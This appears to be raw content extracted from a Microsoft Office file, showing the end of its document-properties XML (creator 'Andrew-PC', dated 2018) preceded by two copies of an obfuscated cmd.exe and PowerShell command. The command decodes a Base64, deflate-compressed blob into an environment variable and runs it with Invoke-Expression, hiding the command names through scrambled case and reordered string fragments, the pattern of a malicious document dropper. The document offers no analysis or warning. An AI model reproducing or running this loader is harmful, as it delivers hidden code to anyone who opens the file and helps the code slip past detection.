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cMD.EXE/c"sET   yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfSd+ELpoyV69oFiajRaz8l6FhK69b4Yx3EOSlfOKmDS5fHKyvC8TNPJPwVvoOobEKysY+3c6maks+ZCc52VINvDqXifP1evg9u7C6wKhF0otUeGqmYFxgZsVkOG8ZOwj2WRiks1hMBEbZVBpRBMK1QNLvfr9XBAWVoY7Tt0Qruc/N5voiSio+E15WRjdULQNmOPedGjn7R35j3K8Acp37gSQW47JH3LI22j89vdgy/3B3Kah81csMaBmmuDbecqOgu7fGEbt8P+4iRtEy5Onh0/SvByezge/wA=' ), [Io.COmpresSIoN.cOmpREssIOnmodE]::DEcomPRESS ) ^|% { New-obJeCT  SYSTem.io.stReamReaDER( $_ ,[SYSteM.TExT.encOdING]::ascII)} ).reaDtoend() ^|invOkE-EXPrESsiOn&amp;&amp; poweRSheLL   Sv  ( 'h' +  'e87r' ) (  [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I'  )  )  ;      .(  \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO'  ) (  (    ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr'  ).Invoke(  'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc'  )))  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cMD.EXE/c"sET   yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfSd+ELpoyV69oFiajRaz8l6FhK69b4Yx3EOSlfOKmDS5fHKyvC8TNPJPwVvoOobEKysY+3c6maks+ZCc52VINvDqXifP1evg9u7C6wKhF0otUeGqmYFxgZsVkOG8ZOwj2WRiks1hMBEbZVBpRBMK1QNLvfr9XBAWVoY7Tt0Qruc/N5voiSio+E15WRjdULQNmOPedGjn7R35j3K8Acp37gSQW47JH3LI22j89vdgy/3B3Kah81csMaBmmuDbecqOgu7fGEbt8P+4iRtEy5Onh0/SvByezge/wA=' ), [Io.COmpresSIoN.cOmpREssIOnmodE]::DEcomPRESS ) ^|% { New-obJeCT  SYSTem.io.stReamReaDER( $_ ,[SYSteM.TExT.encOdING]::ascII)} ).reaDtoend() ^|invOkE-EXPrESsiOn&amp;&amp; poweRSheLL   Sv  ( 'h' +  'e87r' ) (  [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I'  )  )  ;      .(  \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO'  ) (  (    ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr'  ).Invoke(  'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc'  )))  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5:00Z</dcterms:created>
  <dc:creator>Andrew-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-08T11:05:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>